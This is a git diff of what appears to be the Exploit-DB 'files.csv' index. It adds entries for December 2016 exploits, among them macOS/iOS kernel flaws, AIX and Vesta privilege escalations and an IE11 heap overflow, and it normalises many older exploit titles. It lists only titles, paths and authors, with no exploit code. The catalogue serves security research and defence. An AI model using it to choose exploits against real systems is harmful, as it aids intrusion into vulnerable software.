diff --git a/files.csv b/files.csv
index b1cb62ae9..a7326637b 100644
--- a/files.csv
+++ b/files.csv
@@ -3692,6 +3692,7 @@ id,file,description,date,author,platform,type,port
 29310,platforms/multiple/dos/29310.txt,"WikiReader 1.12 - URL Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",multiple,dos,0
 29473,platforms/linux/dos/29473.txt,"Squid Proxy 2.5/2.6 - FTP URI Remote Denial of Service",2007-01-16,"David Duncan Ross Palmer",linux,dos,0
 29362,platforms/multiple/dos/29362.pl,"DB Hub 0.3 - Remote Denial of Service",2006-12-27,"Critical Security",multiple,dos,0
+40960,platforms/windows/dos/40960.svg,"Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap-Based Buffer Overflow (MS14-056)",2016-12-22,Skylined,windows,dos,0
 29387,platforms/windows/dos/29387.pl,"Plogue Sforzando 1.665 - Buffer Overflow (SEH) (PoC)",2013-11-03,"Mike Czumak",windows,dos,0
 29399,platforms/linux/dos/29399.txt,"Multiple PDF Readers - Multiple Remote Buffer Overflow",2007-01-06,LMH,linux,dos,0
 29402,platforms/hardware/dos/29402.txt,"Packeteer PacketShaper 8.0 - Multiple Buffer Overflow Denial of Service Vulnerabilities",2007-01-08,kian.mohageri,hardware,dos,0
@@ -5320,9 +5321,14 @@ id,file,description,date,author,platform,type,port
 40935,platforms/windows/dos/40935.html,"Microsoft Internet Explorer 9 - IEFRAME CView::Ensure­Size Use-After-Free (MS13-021)",2016-12-16,Skylined,windows,dos,0
 40944,platforms/multiple/dos/40944.py,"Google Chrome < 31.0.1650.48 - HTTP 1xx base::String­Tokenizer­T<...>::Quick­Get­Next Out-of-Bounds Read",2016-12-19,Skylined,multiple,dos,0
 40945,platforms/android/dos/40945.txt,"Google Android - WifiNative::setHotlist Stack Overflow",2016-12-20,"Google Security Research",android,dos,0
-40946,platforms/windows/dos/40946.html,"Microsoft Internet Explorer 11 MSHTML - CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)",2016-12-20,Skylined,windows,dos,0
+40946,platforms/windows/dos/40946.html,"Microsoft Internet Explorer 11 - MSHTML CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)",2016-12-20,Skylined,windows,dos,0
 40947,platforms/windows/dos/40947.html,"Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)",2016-12-21,"Google Security Research",windows,dos,0
 40948,platforms/windows/dos/40948.html,"Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)",2016-12-21,"Google Security Research",windows,dos,0
+40952,platforms/macos/dos/40952.c,"macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution",2016-12-22,"Google Security Research",macos,dos,0
+40954,platforms/macos/dos/40954.c,"macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free",2016-12-22,"Google Security Research",macos,dos,0
+40955,platforms/multiple/dos/40955.txt,"macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free",2016-12-22,"Google Security Research",multiple,dos,0
+40958,platforms/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
+40959,platforms/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8723,6 +8729,10 @@ id,file,description,date,author,platform,type,port
 40937,platforms/linux/local/40937.txt,"Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution",2016-12-14,"Donncha OCearbhaill",linux,local,0
 40938,platforms/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock)",2016-12-18,"Hacker Fantastic",linux,local,0
 40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0
+40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0
+40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
+40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
+40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -16076,7 +16086,7 @@ id,file,description,date,author,platform,type,port
 1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Attack Vectors",2006-03-11,Nomenumbra,php,webapps,0
 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,php,webapps,0
 1585,platforms/php/webapps/1585.php,"PHP iCalendar 2.21 - 'cookie' Remote Code Execution",2006-03-15,rgod,php,webapps,0
-1586,platforms/php/webapps/1586.php,"PHP iCalendar 2.21 - (publish.ical.php) Remote Code Execution",2006-03-15,rgod,php,webapps,0
+1586,platforms/php/webapps/1586.php,"PHP iCalendar 2.21 - 'publish.ical.php' Remote Code Execution",2006-03-15,rgod,php,webapps,0
 1587,platforms/php/webapps/1587.pl,"KnowledgebasePublisher 1.2 - 'Include' Remote Code Execution",2006-03-15,uid0,php,webapps,0
 1588,platforms/php/webapps/1588.php,"nodez 4.6.1.1 mercury - Multiple Vulnerabilities",2006-03-18,rgod,php,webapps,0
 1589,platforms/asp/webapps/1589.pl,"BetaParticle Blog 6.0 - 'fldGalleryID' SQL Injection",2006-03-18,nukedx,asp,webapps,0
@@ -16344,7 +16354,7 @@ id,file,description,date,author,platform,type,port
 2003,platforms/php/webapps/2003.txt,"SQuery 4.5 - (gore.php) Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0
 2007,platforms/php/webapps/2007.php,"phpBB 3 - 'memberlist.php' SQL Injection",2006-07-13,rgod,php,webapps,0
 2008,platforms/php/webapps/2008.php,"Phorum 5 - 'pm.php' Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0
-2009,platforms/php/webapps/2009.txt,"CzarNews 1.14 - (tpath) Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0
+2009,platforms/php/webapps/2009.txt,"CzarNews 1.14 - 'tpath' Parameter Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0
 2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection (1)",2006-07-14,RusH,php,webapps,0
 2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) 1.1.5 - 'CLIENT-IP' SQL Injection",2006-07-15,rgod,php,webapps,0
 2018,platforms/php/webapps/2018.txt,"FlushCMS 1.0.0-pre2 - (class.rich.php) Remote File Inclusion",2006-07-16,igi,php,webapps,0
@@ -16838,7 +16848,7 @@ id,file,description,date,author,platform,type,port
 2655,platforms/php/webapps/2655.php,"MiniBB 2.0.2 - 'bb_func_txt.php' Remote File Inclusion",2006-10-26,Kacper,php,webapps,0
 2656,platforms/php/webapps/2656.txt,"MiniBill 20061010 - 'menu_builder.php' File Inclusion",2006-10-26,"Mehmet Ince",php,webapps,0
 2658,platforms/php/webapps/2658.php,"Light Blog Remote - Multiple Vulnerabilities",2006-10-27,BlackHawk,php,webapps,0
-2659,platforms/php/webapps/2659.php,"N/X WCMS 4.1 - (nxheader.inc.php) Remote File Inclusion",2006-10-27,Kacper,php,webapps,0
+2659,platforms/php/webapps/2659.php,"N/X WCMS 4.1 - 'nxheader.inc.php' Remote File Inclusion",2006-10-27,Kacper,php,webapps,0
 2660,platforms/php/webapps/2660.php,"Coppermine Photo Gallery 1.4.9 - SQL Injection",2006-10-27,w4ck1ng,php,webapps,0
 2661,platforms/asp/webapps/2661.asp,"PHP League 0.82 - (classement.php) SQL Injection",2006-10-27,ajann,asp,webapps,0
 2662,platforms/asp/webapps/2662.txt,"Hosting Controller 6.1 Hotfix 3.2 - Unauthenticated Access",2006-10-27,"Soroush Dalili",asp,webapps,0
@@ -16942,7 +16952,7 @@ id,file,description,date,author,platform,type,port
 2794,platforms/php/webapps/2794.txt,"mg.applanix 1.3.1 - (apx_root_path) Remote File Inclusion",2006-11-17,v1per-haCker,php,webapps,0
 2795,platforms/php/webapps/2795.txt,"DoSePa 1.0.4 - 'textview.php' Information Disclosure",2006-11-17,"Craig Heffner",php,webapps,0
 2796,platforms/php/webapps/2796.php,"miniCWB 1.0.0 - (contact.php) Local File Inclusion",2006-11-17,Kacper,php,webapps,0
-2797,platforms/php/webapps/2797.txt,"Powies pForum 1.29a - (editpoll.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0
+2797,platforms/php/webapps/2797.txt,"Powies pForum 1.29a - 'editpoll.php' SQL Injection",2006-11-17,SHiKaA,php,webapps,0
 2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 - (matchdetail.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0
 2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 - (mx_common.php) File Inclusion",2006-11-17,bd0rk,php,webapps,0
 2807,platforms/php/webapps/2807.pl,"Joomla! Component MosReporter 0.9.3 - Remote File Inclusion",2006-11-17,Crackers_Child,php,webapps,0
@@ -17342,7 +17352,7 @@ id,file,description,date,author,platform,type,port
 3455,platforms/php/webapps/3455.htm,"JobSitePro 1.0 - 'search.php' SQL Injection",2007-03-11,ajann,php,webapps,0
 3456,platforms/php/webapps/3456.pl,"Top Auction 1.0 - (viewcat.php) SQL Injection",2007-03-11,ajann,php,webapps,0
 3457,platforms/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",2007-03-11,ajann,php,webapps,0
-3458,platforms/php/webapps/3458.txt,"AssetMan 2.4a - (download_pdf.php) Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps,0
+3458,platforms/php/webapps/3458.txt,"AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps,0
 3459,platforms/php/webapps/3459.txt,"cPanel 10.9.x - 'Fantastico' Local File Inclusion",2007-03-11,"cyb3rt & 020",php,webapps,0
 3465,platforms/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",2007-03-12,K-159,php,webapps,0
 3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - 'layout' Parameter SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0
@@ -17356,7 +17366,7 @@ id,file,description,date,author,platform,type,port
 3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows x86) - Local File Inclusion",2007-03-14,Bl0od3r,php,webapps,0
 3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - (comments.php id) SQL Injection",2007-03-14,WiLdBoY,php,webapps,0
 3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0
-3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - (AdminBlogNewsEdit.asp) Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps,0
+3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps,0
 3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) SQL Injection",2007-03-15,x666,php,webapps,0
 3484,platforms/php/webapps/3484.txt,"WebLog - 'index.php' Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0
 3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - 'INCLUDE_PATH' Remote File Inclusion",2007-03-15,the_day,php,webapps,0
@@ -17665,7 +17675,7 @@ id,file,description,date,author,platform,type,port
 3958,platforms/php/webapps/3958.php,"Alstrasoft Template Seller Pro 3.25 - Admin Password Change",2007-05-20,BlackHawk,php,webapps,0
 3959,platforms/php/webapps/3959.php,"Alstrasoft Template Seller Pro 3.25 - Remote Code Execution",2007-05-20,BlackHawk,php,webapps,0
 3960,platforms/php/webapps/3960.php,"WordPress 2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0
-3962,platforms/php/webapps/3962.txt,"Ol BookMarks Manager 0.7.4 - (root) Remote File Inclusion",2007-05-21,"ThE TiGeR",php,webapps,0
+3962,platforms/php/webapps/3962.txt,"Ol BookMarks Manager 0.7.4 - 'root' Parameter Remote File Inclusion",2007-05-21,"ThE TiGeR",php,webapps,0
 3963,platforms/php/webapps/3963.txt,"TutorialCMS 1.01 - Authentication Bypass",2007-05-21,Silentz,php,webapps,0
 3964,platforms/php/webapps/3964.txt,"Ol BookMarks Manager 0.7.4 - SQL Injection",2007-05-21,"Mehmet Ince",php,webapps,0
 3970,platforms/php/webapps/3970.txt,"BtiTracker 1.4.1 - (become admin) SQL Injection",2007-05-22,m@ge|ozz,php,webapps,0
@@ -17689,7 +17699,7 @@ id,file,description,date,author,platform,type,port
 4000,platforms/php/webapps/4000.txt,"wanewsletter 2.1.3 - Remote File Inclusion",2007-05-28,Mogatil,php,webapps,0
 4003,platforms/php/webapps/4003.sh,"Joomla! Component Phil-a-Form 1.2.0.0 - SQL Injection",2007-05-28,CypherXero,php,webapps,0
 4004,platforms/php/webapps/4004.php,"Inout Search Engine - Remote Code Execution",2007-05-29,BlackHawk,php,webapps,0
-4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 - (live_status.lib.php ROOT) Remote File Inclusion",2007-05-29,"ThE TiGeR",php,webapps,0
+4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 - 'live_status.lib.php' Remote File Inclusion",2007-05-29,"ThE TiGeR",php,webapps,0
 4006,platforms/php/webapps/4006.php,"Pheap 2.0 - Authentication Bypass / Remote Code Execution",2007-05-29,Silentz,php,webapps,0
 4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 - (tr) SQL Injection",2007-05-30,BAHADIR,asp,webapps,0
 4019,platforms/php/webapps/4019.php,"Particle Gallery 1.0.1 - SQL Injection",2007-06-01,Silentz,php,webapps,0
@@ -17808,7 +17818,7 @@ id,file,description,date,author,platform,type,port
 4199,platforms/php/webapps/4199.txt,"Md-Pro 1.0.8x - (Topics topicid) SQL Injection",2007-07-18,anonymous,php,webapps,0
 4201,platforms/php/webapps/4201.txt,"Joomla! Component Pony Gallery 1.5 - SQL Injection",2007-07-19,ajann,php,webapps,0
 4206,platforms/php/webapps/4206.txt,"Blog System 1.x - (index.php news_id) SQL Injection",2007-07-20,t0pP8uZz,php,webapps,0
-4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition - (displaycat catid) SQL Injection",2007-07-21,t0pP8uZz,php,webapps,0
+4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition - 'catid' Parameter SQL Injection",2007-07-21,t0pP8uZz,php,webapps,0
 4210,platforms/php/webapps/4210.txt,"RGameScript Pro - 'page.php id' Remote File Inclusion",2007-07-21,Warpboy,php,webapps,0
 4211,platforms/php/webapps/4211.htm,"JBlog 1.0 - Create / Delete Admin Authentication Bypass",2007-07-21,s4mi,php,webapps,0
 4212,platforms/php/webapps/4212.txt,"Joomla! 1.5 Beta 2 - 'Search' Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0
@@ -17895,7 +17905,7 @@ id,file,description,date,author,platform,type,port
 4384,platforms/php/webapps/4384.txt,"WebED 0.8999a - Multiple Remote File Inclusion",2007-09-08,MhZ91,php,webapps,0
 4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple SQL Injections",2007-09-09,k1tk4t,php,webapps,0
 4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php f' Arbitrary File Download",2007-09-10,k-one,php,webapps,0
-4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 - (MGR) Multiple Remote File Inclusion",2007-09-10,QTRinux,php,webapps,0
+4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 - 'MGR' Parameter Multiple Remote File Inclusion",2007-09-10,QTRinux,php,webapps,0
 4390,platforms/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / Local File Inclusion",2007-09-10,k1tk4t,php,webapps,0
 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0
 4396,platforms/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusion",2007-09-11,aLiiF,php,webapps,0
@@ -18044,8 +18054,8 @@ id,file,description,date,author,platform,type,port
 4607,platforms/php/webapps/4607.txt,"SyndeoCMS 2.5.01 - (cmsdir) Remote File Inclusion",2007-11-04,mdx,php,webapps,0
 4608,platforms/php/webapps/4608.php,"JBC Explorer 7.20 RC 1 - Remote Code Execution",2007-11-05,DarkFig,php,webapps,0
 4609,platforms/asp/webapps/4609.txt,"ASP Message Board 2.2.1c - SQL Injection",2007-11-05,Q7x,asp,webapps,0
-4611,platforms/php/webapps/4611.txt,"jPORTAL 2 - mailer.php SQL Injection",2007-11-06,Kacper,php,webapps,0
-4614,platforms/php/webapps/4614.txt,"jPORTAL 2.3.1 - articles.php SQL Injection",2007-11-09,Alexsize,php,webapps,0
+4611,platforms/php/webapps/4611.txt,"jPORTAL 2 - 'mailer.php' SQL Injection",2007-11-06,Kacper,php,webapps,0
+4614,platforms/php/webapps/4614.txt,"jPORTAL 2.3.1 - 'articles.php' SQL Injection",2007-11-09,Alexsize,php,webapps,0
 4617,platforms/php/webapps/4617.txt,"Softbiz Auctions Script - product_desc.php SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0
 4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script 1 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0
 4619,platforms/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0
@@ -19407,38 +19417,38 @@ id,file,description,date,author,platform,type,port
 6412,platforms/php/webapps/6412.txt,"AvailScript Classmate Script - 'viewprofile.php' SQL Injection",2008-09-09,Stack,php,webapps,0
 6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0
 6416,platforms/php/webapps/6416.txt,"Libera CMS 1.12 - 'cookie' SQL Injection",2008-09-10,StAkeR,php,webapps,0
-6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - Authenticated (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
+6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - 'jid' Parameter SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0
 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
 6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
 6422,platforms/php/webapps/6422.txt,"PHPVID 1.1 - Cross-Site Scripting / SQL Injection",2008-09-10,r45c4l,php,webapps,0
 6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' Parameter SQL Injection",2008-09-10,Cru3l.b0y,php,webapps,0
-6425,platforms/php/webapps/6425.txt,"PhpWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion",2008-09-11,"Khashayar Fereidani",php,webapps,0
+6425,platforms/php/webapps/6425.txt,"PHPWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion",2008-09-11,"Khashayar Fereidani",php,webapps,0
 6426,platforms/php/webapps/6426.txt,"Autodealers CMS AutOnline - 'pageid' Parameter SQL Injection",2008-09-11,r45c4l,php,webapps,0
 6427,platforms/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 - 'p' Parameter Local File Inclusion",2008-09-11,StAkeR,php,webapps,0
 6428,platforms/php/webapps/6428.pl,"Easy Photo Gallery 2.1 - Cross-Site Scripting / File Disclosure/Bypass / SQL Injection",2008-09-11,"Khashayar Fereidani",php,webapps,0
-6430,platforms/php/webapps/6430.txt,"D-iscussion Board 3.01 - (topic) Local File Inclusion",2008-09-11,SirGod,php,webapps,0
+6430,platforms/php/webapps/6430.txt,"D-iscussion Board 3.01 - 'topic' Parameter Local File Inclusion",2008-09-11,SirGod,php,webapps,0
 6431,platforms/php/webapps/6431.pl,"phsBlog 0.2 - Bypass SQL Injection Filtering Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0
 6432,platforms/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution",2008-09-11,"Khashayar Fereidani",php,webapps,0
 6433,platforms/php/webapps/6433.txt,"Autodealers CMS AutOnline - 'id' Parameter SQL Injection",2008-09-11,ZoRLu,php,webapps,0
 6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 - 'id' Parameter SQL Injection",2008-09-11,"Virangar Security",php,webapps,0
-6436,platforms/php/webapps/6436.txt,"PhpWebGallery 1.3.4 - Blind SQL Injection",2008-09-11,Stack,php,webapps,0
+6436,platforms/php/webapps/6436.txt,"PHPWebGallery 1.3.4 - Blind SQL Injection",2008-09-11,Stack,php,webapps,0
 6437,platforms/php/webapps/6437.txt,"Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user",2008-09-11,Stack,php,webapps,0
 6438,platforms/php/webapps/6438.pl,"Yourownbux 4.0 - 'cookie' Authentication Bypass",2008-09-11,Tec-n0x,php,webapps,0
 6439,platforms/php/webapps/6439.txt,"Sports Clubs Web Panel 0.0.1 - Arbitrary File Upload",2008-09-12,Stack,php,webapps,0
-6440,platforms/php/webapps/6440.pl,"PhpWebGallery 1.3.4 - Blind SQL Injection",2008-09-12,ka0x,php,webapps,0
-6442,platforms/php/webapps/6442.txt,"pForum 1.30 - (showprofil.php id) SQL Injection",2008-09-12,tmh,php,webapps,0
-6443,platforms/php/webapps/6443.pl,"WebPortal CMS 0.7.4 - (download.php aid) SQL Injection",2008-09-12,StAkeR,php,webapps,0
-6444,platforms/php/webapps/6444.txt,"iBoutique 4.0 - (cat) SQL Injection",2008-09-12,r45c4l,php,webapps,0
-6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 - (register.php) Arbitrary Add Editor",2008-09-12,mr.al7rbi,php,webapps,0
-6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script 1.0 - 'cat_id' SQL Injection",2008-09-12,FIREH4CK3R,php,webapps,0
+6440,platforms/php/webapps/6440.pl,"PHPWebGallery 1.3.4 - Blind SQL Injection",2008-09-12,ka0x,php,webapps,0
+6442,platforms/php/webapps/6442.txt,"pForum 1.30 - 'showprofil.php' SQL Injection",2008-09-12,tmh,php,webapps,0
+6443,platforms/php/webapps/6443.pl,"WebPortal CMS 0.7.4 - 'download.php' SQL Injection",2008-09-12,StAkeR,php,webapps,0
+6444,platforms/php/webapps/6444.txt,"iBoutique 4.0 - 'cat' Parameter SQL Injection",2008-09-12,r45c4l,php,webapps,0
+6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 - 'register.php' Arbitrary Add Editor",2008-09-12,mr.al7rbi,php,webapps,0
+6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script 1.0 - 'cat_id' Parameter SQL Injection",2008-09-12,FIREH4CK3R,php,webapps,0
 6447,platforms/php/webapps/6447.txt,"pNews 2.03 - 'newsid' Parameter SQL Injection",2008-09-12,r45c4l,php,webapps,0
 6448,platforms/php/webapps/6448.txt,"WebPortal CMS 0.7.4 - 'FCKeditor' Arbitrary File Upload",2008-09-12,S.W.A.T.,php,webapps,0
-6449,platforms/php/webapps/6449.php,"pLink 2.07 - (linkto.php id) Blind SQL Injection",2008-09-13,Stack,php,webapps,0
+6449,platforms/php/webapps/6449.php,"pLink 2.07 - 'linkto.php' Blind SQL Injection",2008-09-13,Stack,php,webapps,0
 6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0
 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion / PHPInfo Disclosure Vulnerabilities",2008-09-13,SirGod,php,webapps,0
 6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 - Local File Inclusion / SQL Injection",2008-09-13,r3dm0v3,php,webapps,0
-6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b - (oyun) SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0
+6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b - 'oyun' Parameter SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0
 6455,platforms/php/webapps/6455.txt,"Linkarity - 'link.php' SQL Injection",2008-09-13,"Egypt Coder",php,webapps,0
 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0
 6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0
@@ -19446,23 +19456,23 @@ id,file,description,date,author,platform,type,port
 6461,platforms/php/webapps/6461.txt,"Cpanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass)",2008-09-14,joker_1,php,webapps,0
 6462,platforms/php/webapps/6462.pl,"CzarNews 1.20 - 'cookie' SQL Injection",2008-09-15,StAkeR,php,webapps,0
 6464,platforms/php/webapps/6464.txt,"CzarNews 1.20 - (Account Hijacking) SQL Injection",2008-09-15,0ut0fbound,php,webapps,0
-6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php c' SQL Injection",2008-09-15,JosS,php,webapps,0
+6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php' SQL Injection",2008-09-15,JosS,php,webapps,0
 6466,platforms/php/webapps/6466.txt,"Link Bid Script 1.5 - Multiple SQL Injections",2008-09-15,SirGod,php,webapps,0
-6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex - (produid) SQL Injection",2008-09-16,SirGod,php,webapps,0
+6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex - 'produid' Parameter SQL Injection",2008-09-16,SirGod,php,webapps,0
 6468,platforms/php/webapps/6468.txt,"Attachmax Dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0
 6469,platforms/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 - 'index.php' SQL Injection",2008-09-16,sl4xUz,php,webapps,0
-6470,platforms/asp/webapps/6470.txt,"Hotel Reservation System - 'city.asp city' Blind SQL Injection",2008-09-16,JosS,asp,webapps,0
-6473,platforms/php/webapps/6473.txt,"phpRealty 0.3 - (INC) Remote File Inclusion",2008-09-17,ka0x,php,webapps,0
-6475,platforms/php/webapps/6475.txt,"PHP Crawler 0.8 - (footer) Remote File Inclusion",2008-09-17,Piker,php,webapps,0
-6478,platforms/php/webapps/6478.txt,"Technote 7 - (shop_this_skin_path) Remote File Inclusion",2008-09-17,webDEViL,php,webapps,0
+6470,platforms/asp/webapps/6470.txt,"Hotel Reservation System - 'city.asp' Blind SQL Injection",2008-09-16,JosS,asp,webapps,0
+6473,platforms/php/webapps/6473.txt,"phpRealty 0.3 - 'INC' Parameter Remote File Inclusion",2008-09-17,ka0x,php,webapps,0
+6475,platforms/php/webapps/6475.txt,"PHP Crawler 0.8 - Remote File Inclusion",2008-09-17,Piker,php,webapps,0
+6478,platforms/php/webapps/6478.txt,"Technote 7 - 'shop_this_skin_path' Parameter Remote File Inclusion",2008-09-17,webDEViL,php,webapps,0
 6480,platforms/php/webapps/6480.txt,"X10media Mp3 Search Engine 1.5.5 - Remote File Inclusion",2008-09-17,THUNDER,php,webapps,0
 6482,platforms/php/webapps/6482.txt,"addalink 4 Beta - Write Approved Links Remote",2008-09-17,Pepelux,php,webapps,0
-6483,platforms/php/webapps/6483.txt,"E-PHP CMS - 'article.php es_id' SQL Injection",2008-09-18,HaCkeR_EgY,php,webapps,0
-6485,platforms/php/webapps/6485.txt,"addalink 4 - 'category_id' SQL Injection",2008-09-18,ka0x,php,webapps,0
-6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 - (random) SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0
